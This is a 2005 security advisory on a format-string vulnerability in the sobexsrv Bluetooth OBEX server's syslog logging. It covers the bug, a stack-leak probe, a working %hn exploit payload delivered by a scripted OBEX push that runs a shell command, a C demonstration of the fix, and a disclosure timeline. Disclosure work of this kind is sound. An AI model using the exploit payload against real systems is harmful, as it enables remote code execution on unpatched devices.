DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'

Author: Kevin Finisterre
Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php
Product: 'sobexsrv'
References:
  http://www.digitalmunition.com/DMA[2005-1202a].txt
  http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz

Description:

The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then you will find new entries there... Over Turkey Day I noticed a blog entry about a 'not really security related but very useful' Bluetooth application from the trifinite.group. There were actually two new applications, but one jumped out at me right away. One of the apps needed hardware I did not have, so I did not pay much attention to it; sobexsrv however seemed interesting.

sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and is therefore a full OBEX server. sobexsrv was designed with flexibility and security in mind...

Since I truly think Trifinite is pretty hardcore I almost didn't bother looking for bugs in this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at cars and shit you can certainly write an OBEX server. Being lazy, I assumed that the examples from the man page were easy enough to get me started using sobexsrv. I quickly found that the first two man page examples can be used as examples for triggering a format string issue.

EXAMPLES
  Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.
    sobexsrv -IS -r /tmp
  Simple secure setup with chroot and Bluetooth security mode-2.
    sobexsrv -s 2 -ISR -l X -r /tmp

In both examples shown above the -S option is used to enable syslog() logging. A format string issue was located almost immediately in the syslog support for the logging functions.
Several instances of user input reach syslog() through dosyslog(): the helper formats its arguments into a local buffer and then hands that buffer to syslog(LOG_INFO, log) as the format string, so any '%' in a client-supplied path is interpreted as a conversion directive rather than logged literally.

kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...

As an example I used a Windows machine with the Widcomm Bluetooth stack to create a folder named "--AAAABBBB%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX FTP interface which worked perfectly for a quick verification of the bug. The %19$x and %20$x directives are resolved against whatever sits at those positions on the daemon's stack, and the folder name itself is what gets read back:

Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected

The host in this example is a PowerPC Linux box, so keep in mind that the x86 offsets will differ. This vulnerability is pretty trivial to exploit, as shown below. We run the server in debug mode so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push.
kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name: %1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for "/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

As you can see we were able to deliver a /bin/sh payload and have the daemon run /usr/bin/id for us. This is what things look like from the attacker's point of view.

animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size=201
Registered transport
set user data
created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC
(1) started a new request
reqdone
Command (00) has now finished, rsp: 20
Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file: %1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20
reqdone
Command (01) has now finished, rsp: 20
Disconnect done!
pushed!!
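The bug shape behind all of the above, and the one-line fix, as an added example that is not sobexsrv's source and not code from the author. It mirrors the dosyslog() pattern from the grep output (snprintf() the message into a local buffer, then pass that buffer to the logger) beside the hardened form that passes the buffer as an argument to a constant "%s" format. fake_syslog() is a stand-in for syslog(3) that writes to a buffer so the two results can be compared; has_format_directive() is an assumed helper name for a log-side check on client-supplied names. The constructed probe uses "%%" (a literal percent sign, well defined for printf) so that the demonstration stays deterministic; with a "%19$x" or "%n" in the name, the vulnerable path reads or writes memory instead.

```c
/* Added example (not sobexsrv's source): the dosyslog() bug shape and its
 * fix.  fake_syslog() stands in for syslog(3) and captures into a buffer;
 * everything else mirrors obexsrv.c: snprintf() the message into `log`,
 * then hand `log` to the logger.   Compile: cc -Wall -o fmtdemo fmtdemo.c
 */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define LOGBUF 256

static char captured[LOGBUF];

/* Same (priority, format, ...) shape as syslog(3), but captures instead of
 * sending to the log daemon.  Like the real thing, it interprets `fmt`. */
static void fake_syslog(int priority, const char *fmt, ...)
{
    va_list ap;
    (void)priority;
    va_start(ap, fmt);
    vsnprintf(captured, sizeof captured, fmt, ap);
    va_end(ap);
}

/* Vulnerable shape: the remote path (m2) is expanded into `log`, and `log`
 * is then used as the format string of the logging call.  Every '%' that
 * came from the OBEX client is now a conversion directive. */
const char *dosyslog_vulnerable(const char *m1, const char *m2)
{
    char log[LOGBUF];
    snprintf(log, sizeof log, m1, m2);
    fake_syslog(LOG_INFO, log);            /* BUG: attacker data as format */
    return captured;
}

/* Fixed shape: the assembled message is an argument to a constant "%s"
 * format, so client-supplied '%' bytes are logged literally. */
const char *dosyslog_fixed(const char *m1, const char *m2)
{
    char log[LOGBUF];
    snprintf(log, sizeof log, m1, m2);
    fake_syslog(LOG_INFO, "%s", log);      /* data is an argument, never the format */
    return captured;
}

/* Assumed helper (not in sobexsrv): flag a client-supplied name that carries
 * a conversion directive, i.e. a '%' not escaped as "%%".  Catches probes of
 * the "--AAAABBBB%19$x.%20$x" kind before they reach a logger. */
int has_format_directive(const char *name)
{
    const char *p;
    for (p = name; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return 1;               /* "%x", "%n", "%19$x", or a trailing '%' */
    }
    return 0;
}

int main(void)
{
    /* Constructed input: a folder name carrying "%%", which is well defined
     * for printf, so the two paths can be compared without undefined
     * behaviour.  With "%19$x" the vulnerable path would leak stack words. */
    const char *path = "/tmp/AAAA%%BBBB";

    printf("vulnerable: %s", dosyslog_vulnerable("created directory \"%s\"\n", path));
    printf("fixed:      %s", dosyslog_fixed("created directory \"%s\"\n", path));
    printf("probe flagged: %d\n", has_format_directive("--AAAABBBB%19$x.%20$x"));
    return 0;
}
```

The vulnerable path collapses "%%" to "%", proving that the client's bytes were parsed as a format; the fixed path logs them unchanged. Note that the fix is in the call to the logger, not in the snprintf() that builds the message: that first call has a constant format string supplied by the daemon and is fine.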
Workaround:

The author issued the following temporary warning before patching the problem:

"the syslog (-S) function of sobexsrv is vulnerable to a formatstring attack and therefore should not be used as of now!"

Fixed versions are available at the following locations.

http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz
http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb
http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary)

Note: This is honestly not that critical of an issue, however it was a fun bug to exploit and it helps satisfy my Bluetooth fetish. In reality only a handful of Nokia 770 Tablet PC users and perhaps a few trifinite.blog users are affected by this issue. Collin made sure this was taken care of very promptly.

Timeline associated with this bug:

11/03/2005 sobexsrv to trifinite.blog posted by Collin Mulliner
11/23/2005 Turkey Day boredom sets in ... email collin about the find.
11/25/2005 sobexsrv-1.0.0pre4.tar.gz released